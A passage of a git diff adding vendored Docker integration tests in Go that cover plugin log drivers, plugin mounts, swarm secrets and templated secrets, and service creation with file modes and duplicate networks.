+// Ensure that a daemon with a log plugin set as the default logger for containers
+// does not keep the daemon from starting.
+func TestDaemonStartWithLogOpt(t *testing.T) {
+	skip.If(t, testEnv.IsRemoteDaemon, "cannot run daemon when remote daemon")
+	t.Parallel()
+
+	d := daemon.New(t)
+	d.Start(t, "--iptables=false")
+	defer d.Stop(t)
+
+	client, err := d.NewClient()
+	assert.Check(t, err)
+	ctx := context.Background()
+
+	createPlugin(t, client, "test", "dummy", asLogDriver)
+	err = client.PluginEnable(ctx, "test", types.PluginEnableOptions{Timeout: 30})
+	assert.Check(t, err)
+	defer client.PluginRemove(ctx, "test", types.PluginRemoveOptions{Force: true})
+
+	d.Stop(t)
+	d.Start(t, "--iptables=false", "--log-driver=test", "--log-opt=foo=bar")
+}
diff --git a/vendor/github.com/docker/docker/integration/plugin/pkg_test.go b/vendor/github.com/docker/docker/integration/plugin/pkg_test.go
new file mode 100644
index 0000000000..b56d3e2bae
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/plugin/pkg_test.go
@@ -0,0 +1 @@
+package plugin // import "github.com/docker/docker/integration/plugin"
diff --git a/vendor/github.com/docker/docker/integration/plugin/volumes/cmd/cmd_test.go b/vendor/github.com/docker/docker/integration/plugin/volumes/cmd/cmd_test.go
new file mode 100644
index 0000000000..1d619dd05e
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/plugin/volumes/cmd/cmd_test.go
@@ -0,0 +1 @@
+package cmd
diff --git a/vendor/github.com/docker/docker/integration/plugin/volumes/cmd/dummy/main.go b/vendor/github.com/docker/docker/integration/plugin/volumes/cmd/dummy/main.go
new file mode 100644
index 0000000000..f91b4f3b02
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/plugin/volumes/cmd/dummy/main.go
@@ -0,0 +1,19 @@
+package main
+
+import (
+	"net"
+	"net/http"
+)
+
+func main() {
+	l, err := net.Listen("unix", "/run/docker/plugins/plugin.sock")
+	if err != nil {
+		panic(err)
+	}
+
+	server := http.Server{
+		Addr:    l.Addr().String(),
+		Handler: http.NewServeMux(),
+	}
+	server.Serve(l)
+}
diff --git a/vendor/github.com/docker/docker/integration/plugin/volumes/cmd/dummy/main_test.go b/vendor/github.com/docker/docker/integration/plugin/volumes/cmd/dummy/main_test.go
new file mode 100644
index 0000000000..06ab7d0f9a
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/plugin/volumes/cmd/dummy/main_test.go
@@ -0,0 +1 @@
+package main
diff --git a/vendor/github.com/docker/docker/integration/plugin/volumes/helpers_test.go b/vendor/github.com/docker/docker/integration/plugin/volumes/helpers_test.go
new file mode 100644
index 0000000000..36aafd59c2
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/plugin/volumes/helpers_test.go
@@ -0,0 +1,73 @@
+package volumes
+
+import (
+	"context"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/internal/test/fixtures/plugin"
+	"github.com/docker/docker/pkg/locker"
+	"github.com/pkg/errors"
+)
+
+var pluginBuildLock = locker.New()
+
+// ensurePlugin makes the that a plugin binary has been installed on the system.
+// Plugins that have not been installed are built from `cmd/<name>`.
+func ensurePlugin(t *testing.T, name string) string {
+	pluginBuildLock.Lock(name)
+	defer pluginBuildLock.Unlock(name)
+
+	goPath := os.Getenv("GOPATH")
+	if goPath == "" {
+		goPath = "/go"
+	}
+	installPath := filepath.Join(goPath, "bin", name)
+	if _, err := os.Stat(installPath); err == nil {
+		return installPath
+	}
+
+	goBin, err := exec.LookPath("go")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	cmd := exec.Command(goBin, "build", "-o", installPath, "./"+filepath.Join("cmd", name))
+	cmd.Env = append(cmd.Env, "CGO_ENABLED=0")
+	if out, err := cmd.CombinedOutput(); err != nil {
+		t.Fatal(errors.Wrapf(err, "error building basic plugin bin: %s", string(out)))
+	}
+
+	return installPath
+}
+
+func withSockPath(name string) func(*plugin.Config) {
+	return func(cfg *plugin.Config) {
+		cfg.Interface.Socket = name
+	}
+}
+
+func createPlugin(t *testing.T, client plugin.CreateClient, alias, bin string, opts ...plugin.CreateOpt) {
+	pluginBin := ensurePlugin(t, bin)
+
+	opts = append(opts, withSockPath("plugin.sock"))
+	opts = append(opts, plugin.WithBinary(pluginBin))
+
+	ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
+	err := plugin.Create(ctx, client, alias, opts...)
+	cancel()
+
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+func asVolumeDriver(cfg *plugin.Config) {
+	cfg.Interface.Types = []types.PluginInterfaceType{
+		{Capability: "volumedriver", Prefix: "docker", Version: "1.0"},
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration/plugin/volumes/main_test.go b/vendor/github.com/docker/docker/integration/plugin/volumes/main_test.go
new file mode 100644
index 0000000000..5a5678d9c4
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/plugin/volumes/main_test.go
@@ -0,0 +1,32 @@
+package volumes // import "github.com/docker/docker/integration/plugin/volumes"
+
+import (
+	"fmt"
+	"os"
+	"testing"
+
+	"github.com/docker/docker/internal/test/environment"
+)
+
+var (
+	testEnv *environment.Execution
+)
+
+func TestMain(m *testing.M) {
+	var err error
+	testEnv, err = environment.New()
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+	if testEnv.OSType != "linux" {
+		os.Exit(0)
+	}
+	err = environment.EnsureFrozenImagesLinux(testEnv)
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+	testEnv.Print()
+	os.Exit(m.Run())
+}
diff --git a/vendor/github.com/docker/docker/integration/plugin/volumes/mounts_test.go b/vendor/github.com/docker/docker/integration/plugin/volumes/mounts_test.go
new file mode 100644
index 0000000000..4b422ee5c3
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/plugin/volumes/mounts_test.go
@@ -0,0 +1,58 @@
+package volumes
+
+import (
+	"context"
+	"io/ioutil"
+	"os"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/internal/test/daemon"
+	"github.com/docker/docker/internal/test/fixtures/plugin"
+	"gotest.tools/assert"
+	"gotest.tools/skip"
+)
+
+// TestPluginWithDevMounts tests very specific regression caused by mounts ordering
+// (sorted in the daemon). See #36698
+func TestPluginWithDevMounts(t *testing.T) {
+	skip.If(t, testEnv.IsRemoteDaemon, "cannot run daemon when remote daemon")
+	t.Parallel()
+
+	d := daemon.New(t)
+	d.Start(t, "--iptables=false")
+	defer d.Stop(t)
+
+	client, err := d.NewClient()
+	assert.Assert(t, err)
+	ctx := context.Background()
+
+	testDir, err := ioutil.TempDir("", "test-dir")
+	assert.Assert(t, err)
+	defer os.RemoveAll(testDir)
+
+	createPlugin(t, client, "test", "dummy", asVolumeDriver, func(c *plugin.Config) {
+		root := "/"
+		dev := "/dev"
+		mounts := []types.PluginMount{
+			{Type: "bind", Source: &root, Destination: "/host", Options: []string{"rbind"}},
+			{Type: "bind", Source: &dev, Destination: "/dev", Options: []string{"rbind"}},
+			{Type: "bind", Source: &testDir, Destination: "/etc/foo", Options: []string{"rbind"}},
+		}
+		c.PluginConfig.Mounts = append(c.PluginConfig.Mounts, mounts...)
+		c.PropagatedMount = "/propagated"
+		c.Network = types.PluginConfigNetwork{Type: "host"}
+		c.IpcHost = true
+	})
+
+	err = client.PluginEnable(ctx, "test", types.PluginEnableOptions{Timeout: 30})
+	assert.Assert(t, err)
+	defer func() {
+		err := client.PluginRemove(ctx, "test", types.PluginRemoveOptions{Force: true})
+		assert.Check(t, err)
+	}()
+
+	p, _, err := client.PluginInspectWithRaw(ctx, "test")
+	assert.Assert(t, err)
+	assert.Assert(t, p.Enabled)
+}
diff --git a/vendor/github.com/docker/docker/integration/secret/main_test.go b/vendor/github.com/docker/docker/integration/secret/main_test.go
new file mode 100644
index 0000000000..abd4eef9f0
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/secret/main_test.go
@@ -0,0 +1,33 @@
+package secret // import "github.com/docker/docker/integration/secret"
+
+import (
+	"fmt"
+	"os"
+	"testing"
+
+	"github.com/docker/docker/internal/test/environment"
+)
+
+var testEnv *environment.Execution
+
+func TestMain(m *testing.M) {
+	var err error
+	testEnv, err = environment.New()
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+	err = environment.EnsureFrozenImagesLinux(testEnv)
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+
+	testEnv.Print()
+	os.Exit(m.Run())
+}
+
+func setupTest(t *testing.T) func() {
+	environment.ProtectAll(t, testEnv)
+	return func() { testEnv.Clean(t) }
+}
diff --git a/vendor/github.com/docker/docker/integration/secret/secret_test.go b/vendor/github.com/docker/docker/integration/secret/secret_test.go
new file mode 100644
index 0000000000..ecc3108f65
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/secret/secret_test.go
@@ -0,0 +1,366 @@
+package secret // import "github.com/docker/docker/integration/secret"
+
+import (
+	"bytes"
+	"context"
+	"sort"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	swarmtypes "github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration/internal/swarm"
+	"github.com/docker/docker/pkg/stdcopy"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/skip"
+)
+
+func TestSecretInspect(t *testing.T) {
+	skip.If(t, testEnv.DaemonInfo.OSType != "linux")
+
+	defer setupTest(t)()
+	d := swarm.NewSwarm(t, testEnv)
+	defer d.Stop(t)
+	client := d.NewClientT(t)
+	defer client.Close()
+
+	ctx := context.Background()
+
+	testName := "test_secret_" + t.Name()
+	secretID := createSecret(ctx, t, client, testName, []byte("TESTINGDATA"), nil)
+
+	secret, _, err := client.SecretInspectWithRaw(context.Background(), secretID)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(secret.Spec.Name, testName))
+
+	secret, _, err = client.SecretInspectWithRaw(context.Background(), testName)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(secretID, secretID))
+}
+
+func TestSecretList(t *testing.T) {
+	skip.If(t, testEnv.DaemonInfo.OSType != "linux")
+
+	defer setupTest(t)()
+	d := swarm.NewSwarm(t, testEnv)
+	defer d.Stop(t)
+	client := d.NewClientT(t)
+	defer client.Close()
+	ctx := context.Background()
+
+	testName0 := "test0_" + t.Name()
+	testName1 := "test1_" + t.Name()
+	testNames := []string{testName0, testName1}
+	sort.Strings(testNames)
+
+	// create secret test0
+	createSecret(ctx, t, client, testName0, []byte("TESTINGDATA0"), map[string]string{"type": "test"})
+
+	// create secret test1
+	secret1ID := createSecret(ctx, t, client, testName1, []byte("TESTINGDATA1"), map[string]string{"type": "production"})
+
+	names := func(entries []swarmtypes.Secret) []string {
+		var values []string
+		for _, entry := range entries {
+			values = append(values, entry.Spec.Name)
+		}
+		sort.Strings(values)
+		return values
+	}
+
+	// test by `secret ls`
+	entries, err := client.SecretList(ctx, types.SecretListOptions{})
+	assert.NilError(t, err)
+	assert.Check(t, is.DeepEqual(names(entries), testNames))
+
+	testCases := []struct {
+		filters  filters.Args
+		expected []string
+	}{
+		// test filter by name `secret ls --filter name=xxx`
+		{
+			filters:  filters.NewArgs(filters.Arg("name", testName0)),
+			expected: []string{testName0},
+		},
+		// test filter by id `secret ls --filter id=xxx`
+		{
+			filters:  filters.NewArgs(filters.Arg("id", secret1ID)),
+			expected: []string{testName1},
+		},
+		// test filter by label `secret ls --filter label=xxx`
+		{
+			filters:  filters.NewArgs(filters.Arg("label", "type")),
+			expected: testNames,
+		},
+		{
+			filters:  filters.NewArgs(filters.Arg("label", "type=test")),
+			expected: []string{testName0},
+		},
+		{
+			filters:  filters.NewArgs(filters.Arg("label", "type=production")),
+			expected: []string{testName1},
+		},
+	}
+	for _, tc := range testCases {
+		entries, err = client.SecretList(ctx, types.SecretListOptions{
+			Filters: tc.filters,
+		})
+		assert.NilError(t, err)
+		assert.Check(t, is.DeepEqual(names(entries), tc.expected))
+
+	}
+}
+
+func createSecret(ctx context.Context, t *testing.T, client client.APIClient, name string, data []byte, labels map[string]string) string {
+	secret, err := client.SecretCreate(ctx, swarmtypes.SecretSpec{
+		Annotations: swarmtypes.Annotations{
+			Name:   name,
+			Labels: labels,
+		},
+		Data: data,
+	})
+	assert.NilError(t, err)
+	assert.Check(t, secret.ID != "")
+	return secret.ID
+}
+
+func TestSecretsCreateAndDelete(t *testing.T) {
+	skip.If(t, testEnv.DaemonInfo.OSType != "linux")
+
+	defer setupTest(t)()
+	d := swarm.NewSwarm(t, testEnv)
+	defer d.Stop(t)
+	client := d.NewClientT(t)
+	defer client.Close()
+	ctx := context.Background()
+
+	testName := "test_secret_" + t.Name()
+	secretID := createSecret(ctx, t, client, testName, []byte("TESTINGDATA"), nil)
+
+	// create an already existin secret, daemon should return a status code of 409
+	_, err := client.SecretCreate(ctx, swarmtypes.SecretSpec{
+		Annotations: swarmtypes.Annotations{
+			Name: testName,
+		},
+		Data: []byte("TESTINGDATA"),
+	})
+	assert.Check(t, is.ErrorContains(err, "already exists"))
+
+	// Ported from original TestSecretsDelete
+	err = client.SecretRemove(ctx, secretID)
+	assert.NilError(t, err)
+
+	_, _, err = client.SecretInspectWithRaw(ctx, secretID)
+	assert.Check(t, is.ErrorContains(err, "No such secret"))
+
+	err = client.SecretRemove(ctx, "non-existin")
+	assert.Check(t, is.ErrorContains(err, "No such secret: non-existin"))
+
+	// Ported from original TestSecretsCreteaWithLabels
+	testName = "test_secret_with_labels_" + t.Name()
+	secretID = createSecret(ctx, t, client, testName, []byte("TESTINGDATA"), map[string]string{
+		"key1": "value1",
+		"key2": "value2",
+	})
+
+	insp, _, err := client.SecretInspectWithRaw(ctx, secretID)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(insp.Spec.Name, testName))
+	assert.Check(t, is.Equal(len(insp.Spec.Labels), 2))
+	assert.Check(t, is.Equal(insp.Spec.Labels["key1"], "value1"))
+	assert.Check(t, is.Equal(insp.Spec.Labels["key2"], "value2"))
+}
+
+func TestSecretsUpdate(t *testing.T) {
+	skip.If(t, testEnv.DaemonInfo.OSType != "linux")
+
+	defer setupTest(t)()
+	d := swarm.NewSwarm(t, testEnv)
+	defer d.Stop(t)
+	client := d.NewClientT(t)
+	defer client.Close()
+	ctx := context.Background()
+
+	testName := "test_secret_" + t.Name()
+	secretID := createSecret(ctx, t, client, testName, []byte("TESTINGDATA"), nil)
+
+	insp, _, err := client.SecretInspectWithRaw(ctx, secretID)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(insp.ID, secretID))
+
+	// test UpdateSecret with full ID
+	insp.Spec.Labels = map[string]string{"test": "test1"}
+	err = client.SecretUpdate(ctx, secretID, insp.Version, insp.Spec)
+	assert.NilError(t, err)
+
+	insp, _, err = client.SecretInspectWithRaw(ctx, secretID)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(insp.Spec.Labels["test"], "test1"))
+
+	// test UpdateSecret with full name
+	insp.Spec.Labels = map[string]string{"test": "test2"}
+	err = client.SecretUpdate(ctx, testName, insp.Version, insp.Spec)
+	assert.NilError(t, err)
+
+	insp, _, err = client.SecretInspectWithRaw(ctx, secretID)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(insp.Spec.Labels["test"], "test2"))
+
+	// test UpdateSecret with prefix ID
+	insp.Spec.Labels = map[string]string{"test": "test3"}
+	err = client.SecretUpdate(ctx, secretID[:1], insp.Version, insp.Spec)
+	assert.NilError(t, err)
+
+	insp, _, err = client.SecretInspectWithRaw(ctx, secretID)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(insp.Spec.Labels["test"], "test3"))
+
+	// test UpdateSecret in updating Data which is not supported in daemon
+	// this test will produce an error in func UpdateSecret
+	insp.Spec.Data = []byte("TESTINGDATA2")
+	err = client.SecretUpdate(ctx, secretID, insp.Version, insp.Spec)
+	assert.Check(t, is.ErrorContains(err, "only updates to Labels are allowed"))
+}
+
+func TestTemplatedSecret(t *testing.T) {
+	d := swarm.NewSwarm(t, testEnv)
+	defer d.Stop(t)
+	client := d.NewClientT(t)
+	defer client.Close()
+	ctx := context.Background()
+
+	referencedSecretName := "referencedsecret_" + t.Name()
+	referencedSecretSpec := swarmtypes.SecretSpec{
+		Annotations: swarmtypes.Annotations{
+			Name: referencedSecretName,
+		},
+		Data: []byte("this is a secret"),
+	}
+	referencedSecret, err := client.SecretCreate(ctx, referencedSecretSpec)
+	assert.Check(t, err)
+
+	referencedConfigName := "referencedconfig_" + t.Name()
+	referencedConfigSpec := swarmtypes.ConfigSpec{
+		Annotations: swarmtypes.Annotations{
+			Name: referencedConfigName,
+		},
+		Data: []byte("this is a config"),
+	}
+	referencedConfig, err := client.ConfigCreate(ctx, referencedConfigSpec)
+	assert.Check(t, err)
+
+	templatedSecretName := "templated_secret_" + t.Name()
+	secretSpec := swarmtypes.SecretSpec{
+		Annotations: swarmtypes.Annotations{
+			Name: templatedSecretName,
+		},
+		Templating: &swarmtypes.Driver{
+			Name: "golang",
+		},
+		Data: []byte("SERVICE_NAME={{.Service.Name}}\n" +
+			"{{secret \"referencedsecrettarget\"}}\n" +
+			"{{config \"referencedconfigtarget\"}}\n"),
+	}
+
+	templatedSecret, err := client.SecretCreate(ctx, secretSpec)
+	assert.Check(t, err)
+
+	serviceName := "svc_" + t.Name()
+	serviceID := swarm.CreateService(t, d,
+		swarm.ServiceWithSecret(
+			&swarmtypes.SecretReference{
+				File: &swarmtypes.SecretReferenceFileTarget{
+					Name: "templated_secret",
+					UID:  "0",
+					GID:  "0",
+					Mode: 0600,
+				},
+				SecretID:   templatedSecret.ID,
+				SecretName: templatedSecretName,
+			},
+		),
+		swarm.ServiceWithConfig(
+			&swarmtypes.ConfigReference{
+				File: &swarmtypes.ConfigReferenceFileTarget{
+					Name: "referencedconfigtarget",
+					UID:  "0",
+					GID:  "0",
+					Mode: 0600,
+				},
+				ConfigID:   referencedConfig.ID,
+				ConfigName: referencedConfigName,
+			},
+		),
+		swarm.ServiceWithSecret(
+			&swarmtypes.SecretReference{
+				File: &swarmtypes.SecretReferenceFileTarget{
+					Name: "referencedsecrettarget",
+					UID:  "0",
+					GID:  "0",
+					Mode: 0600,
+				},
+				SecretID:   referencedSecret.ID,
+				SecretName: referencedSecretName,
+			},
+		),
+		swarm.ServiceWithName(serviceName),
+	)
+
+	var tasks []swarmtypes.Task
+	waitAndAssert(t, 60*time.Second, func(t *testing.T) bool {
+		tasks = swarm.GetRunningTasks(t, d, serviceID)
+		return len(tasks) > 0
+	})
+
+	task := tasks[0]
+	waitAndAssert(t, 60*time.Second, func(t *testing.T) bool {
+		if task.NodeID == "" || (task.Status.ContainerStatus == nil || task.Status.ContainerStatus.ContainerID == "") {
+			task, _, _ = client.TaskInspectWithRaw(context.Background(), task.ID)
+		}
+		return task.NodeID != "" && task.Status.ContainerStatus != nil && task.Status.ContainerStatus.ContainerID != ""
+	})
+
+	attach := swarm.ExecTask(t, d, task, types.ExecConfig{
+		Cmd:          []string{"/bin/cat", "/run/secrets/templated_secret"},
+		AttachStdout: true,
+		AttachStderr: true,
+	})
+
+	expect := "SERVICE_NAME=" + serviceName + "\n" +
+		"this is a secret\n" +
+		"this is a config\n"
+	assertAttachedStream(t, attach, expect)
+
+	attach = swarm.ExecTask(t, d, task, types.ExecConfig{
+		Cmd:          []string{"mount"},
+		AttachStdout: true,
+		AttachStderr: true,
+	})
+	assertAttachedStream(t, attach, "tmpfs on /run/secrets/templated_secret type tmpfs")
+}
+
+func assertAttachedStream(t *testing.T, attach types.HijackedResponse, expect string) {
+	buf := bytes.NewBuffer(nil)
+	_, err := stdcopy.StdCopy(buf, buf, attach.Reader)
+	assert.NilError(t, err)
+	assert.Check(t, is.Contains(buf.String(), expect))
+}
+
+func waitAndAssert(t *testing.T, timeout time.Duration, f func(*testing.T) bool) {
+	t.Helper()
+	after := time.After(timeout)
+	for {
+		select {
+		case <-after:
+			t.Fatalf("timed out waiting for condition")
+		default:
+		}
+		if f(t) {
+			return
+		}
+		time.Sleep(100 * time.Millisecond)
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration/service/create_test.go b/vendor/github.com/docker/docker/integration/service/create_test.go
new file mode 100644
index 0000000000..a89ae0a172
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/service/create_test.go
@@ -0,0 +1,374 @@
+package service // import "github.com/docker/docker/integration/service"
+
+import (
+	"context"
+	"fmt"
+	"io/ioutil"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	swarmtypes "github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration/internal/network"
+	"github.com/docker/docker/integration/internal/swarm"
+	"github.com/docker/docker/internal/test/daemon"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/poll"
+)
+
+func TestServiceCreateInit(t *testing.T) {
+	defer setupTest(t)()
+	t.Run("daemonInitDisabled", testServiceCreateInit(false))
+	t.Run("daemonInitEnabled", testServiceCreateInit(true))
+}
+
+func testServiceCreateInit(daemonEnabled bool) func(t *testing.T) {
+	return func(t *testing.T) {
+		var ops = []func(*daemon.Daemon){}
+
+		if daemonEnabled {
+			ops = append(ops, daemon.WithInit)
+		}
+		d := swarm.NewSwarm(t, testEnv, ops...)
+		defer d.Stop(t)
+		client := d.NewClientT(t)
+		defer client.Close()
+
+		booleanTrue := true
+		booleanFalse := false
+
+		serviceID := swarm.CreateService(t, d)
+		poll.WaitOn(t, serviceRunningTasksCount(client, serviceID, 1), swarm.ServicePoll)
+		i := inspectServiceContainer(t, client, serviceID)
+		// HostConfig.Init == nil means that it delegates to daemon configuration
+		assert.Check(t, i.HostConfig.Init == nil)
+
+		serviceID = swarm.CreateService(t, d, swarm.ServiceWithInit(&booleanTrue))
+		poll.WaitOn(t, serviceRunningTasksCount(client, serviceID, 1), swarm.ServicePoll)
+		i = inspectServiceContainer(t, client, serviceID)
+		assert.Check(t, is.Equal(true, *i.HostConfig.Init))
+
+		serviceID = swarm.CreateService(t, d, swarm.ServiceWithInit(&booleanFalse))
+		poll.WaitOn(t, serviceRunningTasksCount(client, serviceID, 1), swarm.ServicePoll)
+		i = inspectServiceContainer(t, client, serviceID)
+		assert.Check(t, is.Equal(false, *i.HostConfig.Init))
+	}
+}
+
+func inspectServiceContainer(t *testing.T, client client.APIClient, serviceID string) types.ContainerJSON {
+	t.Helper()
+	filter := filters.NewArgs()
+	filter.Add("label", fmt.Sprintf("com.docker.swarm.service.id=%s", serviceID))
+	containers, err := client.ContainerList(context.Background(), types.ContainerListOptions{Filters: filter})
+	assert.NilError(t, err)
+	assert.Check(t, is.Len(containers, 1))
+
+	i, err := client.ContainerInspect(context.Background(), containers[0].ID)
+	assert.NilError(t, err)
+	return i
+}
+
+func TestCreateServiceMultipleTimes(t *testing.T) {
+	defer setupTest(t)()
+	d := swarm.NewSwarm(t, testEnv)
+	defer d.Stop(t)
+	client := d.NewClientT(t)
+	defer client.Close()
+
+	overlayName := "overlay1_" + t.Name()
+	overlayID := network.CreateNoError(t, context.Background(), client, overlayName,
+		network.WithCheckDuplicate(),
+		network.WithDriver("overlay"),
+	)
+
+	var instances uint64 = 4
+
+	serviceName := "TestService_" + t.Name()
+	serviceSpec := []swarm.ServiceSpecOpt{
+		swarm.ServiceWithReplicas(instances),
+		swarm.ServiceWithName(serviceName),
+		swarm.ServiceWithNetwork(overlayName),
+	}
+
+	serviceID := swarm.CreateService(t, d, serviceSpec...)
+	poll.WaitOn(t, serviceRunningTasksCount(client, serviceID, instances), swarm.ServicePoll)
+
+	_, _, err := client.ServiceInspectWithRaw(context.Background(), serviceID, types.ServiceInspectOptions{})
+	assert.NilError(t, err)
+
+	err = client.ServiceRemove(context.Background(), serviceID)
+	assert.NilError(t, err)
+
+	poll.WaitOn(t, serviceIsRemoved(client, serviceID), swarm.ServicePoll)
+	poll.WaitOn(t, noTasks(client), swarm.ServicePoll)
+
+	serviceID2 := swarm.CreateService(t, d, serviceSpec...)
+	poll.WaitOn(t, serviceRunningTasksCount(client, serviceID2, instances), swarm.ServicePoll)
+
+	err = client.ServiceRemove(context.Background(), serviceID2)
+	assert.NilError(t, err)
+
+	poll.WaitOn(t, serviceIsRemoved(client, serviceID2), swarm.ServicePoll)
+	poll.WaitOn(t, noTasks(client), swarm.ServicePoll)
+
+	err = client.NetworkRemove(context.Background(), overlayID)
+	assert.NilError(t, err)
+
+	poll.WaitOn(t, networkIsRemoved(client, overlayID), poll.WithTimeout(1*time.Minute), poll.WithDelay(10*time.Second))
+}
+
+func TestCreateWithDuplicateNetworkNames(t *testing.T) {
+	defer setupTest(t)()
+	d := swarm.NewSwarm(t, testEnv)
+	defer d.Stop(t)
+	client := d.NewClientT(t)
+	defer client.Close()
+
+	name := "foo_" + t.Name()
+	n1 := network.CreateNoError(t, context.Background(), client, name,
+		network.WithDriver("bridge"),
+	)
+	n2 := network.CreateNoError(t, context.Background(), client, name,
+		network.WithDriver("bridge"),
+	)
+
+	// Dupliates with name but with different driver
+	n3 := network.CreateNoError(t, context.Background(), client, name,
+		network.WithDriver("overlay"),
+	)
+
+	// Create Service with the same name
+	var instances uint64 = 1
+
+	serviceName := "top_" + t.Name()
+	serviceID := swarm.CreateService(t, d,
+		swarm.ServiceWithReplicas(instances),
+		swarm.ServiceWithName(serviceName),
+		swarm.ServiceWithNetwork(name),
+	)
+
+	poll.WaitOn(t, serviceRunningTasksCount(client, serviceID, instances), swarm.ServicePoll)
+
+	resp, _, err := client.ServiceInspectWithRaw(context.Background(), serviceID, types.ServiceInspectOptions{})
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(n3, resp.Spec.TaskTemplate.Networks[0].Target))
+
+	// Remove Service
+	err = client.ServiceRemove(context.Background(), serviceID)
+	assert.NilError(t, err)
+
+	// Make sure task has been destroyed.
+	poll.WaitOn(t, serviceIsRemoved(client, serviceID), swarm.ServicePoll)
+
+	// Remove networks
+	err = client.NetworkRemove(context.Background(), n3)
+	assert.NilError(t, err)
+
+	err = client.NetworkRemove(context.Background(), n2)
+	assert.NilError(t, err)
+
+	err = client.NetworkRemove(context.Background(), n1)
+	assert.NilError(t, err)
+
+	// Make sure networks have been destroyed.
+	poll.WaitOn(t, networkIsRemoved(client, n3), poll.WithTimeout(1*time.Minute), poll.WithDelay(10*time.Second))
+	poll.WaitOn(t, networkIsRemoved(client, n2), poll.WithTimeout(1*time.Minute), poll.WithDelay(10*time.Second))
+	poll.WaitOn(t, networkIsRemoved(client, n1), poll.WithTimeout(1*time.Minute), poll.WithDelay(10*time.Second))
+}
+
+func TestCreateServiceSecretFileMode(t *testing.T) {
+	defer setupTest(t)()
+	d := swarm.NewSwarm(t, testEnv)
+	defer d.Stop(t)
+	client := d.NewClientT(t)
+	defer client.Close()
+
+	ctx := context.Background()
+	secretName := "TestSecret_" + t.Name()
+	secretResp, err := client.SecretCreate(ctx, swarmtypes.SecretSpec{
+		Annotations: swarmtypes.Annotations{
+			Name: secretName,
+		},
+		Data: []byte("TESTSECRET"),
+	})
+	assert.NilError(t, err)
+
+	var instances uint64 = 1
+	serviceName := "TestService_" + t.Name()
+	serviceID := swarm.CreateService(t, d,
+		swarm.ServiceWithReplicas(instances),
+		swarm.ServiceWithName(serviceName),
+		swarm.ServiceWithCommand([]string{"/bin/sh", "-c", "ls -l /etc/secret || /bin/top"}),
+		swarm.ServiceWithSecret(&swarmtypes.SecretReference{
+			File: &swarmtypes.SecretReferenceFileTarget{
+				Name: "/etc/secret",
+				UID:  "0",
+				GID:  "0",
+				Mode: 0777,
+			},
+			SecretID:   secretResp.ID,
+			SecretName: secretName,
+		}),
+	)
+
+	poll.WaitOn(t, serviceRunningTasksCount(client, serviceID, instances), swarm.ServicePoll)
+
+	filter := filters.NewArgs()
+	filter.Add("service", serviceID)
+	tasks, err := client.TaskList(ctx, types.TaskListOptions{
+		Filters: filter,
+	})
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(len(tasks), 1))
+
+	body, err := client.ContainerLogs(ctx, tasks[0].Status.ContainerStatus.ContainerID, types.ContainerLogsOptions{
+		ShowStdout: true,
+	})
+	assert.NilError(t, err)
+	defer body.Close()
+
+	content, err := ioutil.ReadAll(body)
+	assert.NilError(t, err)
+	assert.Check(t, is.Contains(string(content), "-rwxrwxrwx"))
+
+	err = client.ServiceRemove(ctx, serviceID)
+	assert.NilError(t, err)
+
+	poll.WaitOn(t, serviceIsRemoved(client, serviceID), swarm.ServicePoll)
+	poll.WaitOn(t, noTasks(client), swarm.ServicePoll)
+
+	err = client.SecretRemove(ctx, secretName)
+	assert.NilError(t, err)
+}
+
+func TestCreateServiceConfigFileMode(t *testing.T) {
+	defer setupTest(t)()
+	d := swarm.NewSwarm(t, testEnv)
+	defer d.Stop(t)
+	client := d.NewClientT(t)
+	defer client.Close()
+
+	ctx := context.Background()
+	configName := "TestConfig_" + t.Name()
+	configResp, err := client.ConfigCreate(ctx, swarmtypes.ConfigSpec{
+		Annotations: swarmtypes.Annotations{
+			Name: configName,
+		},
+		Data: []byte("TESTCONFIG"),
+	})
+	assert.NilError(t, err)
+
+	var instances uint64 = 1
+	serviceName := "TestService_" + t.Name()
+	serviceID := swarm.CreateService(t, d,
+		swarm.ServiceWithName(serviceName),
+		swarm.ServiceWithCommand([]string{"/bin/sh", "-c", "ls -l /etc/config || /bin/top"}),
+		swarm.ServiceWithReplicas(instances),
+		swarm.ServiceWithConfig(&swarmtypes.ConfigReference{
+			File: &swarmtypes.ConfigReferenceFileTarget{
+				Name: "/etc/config",
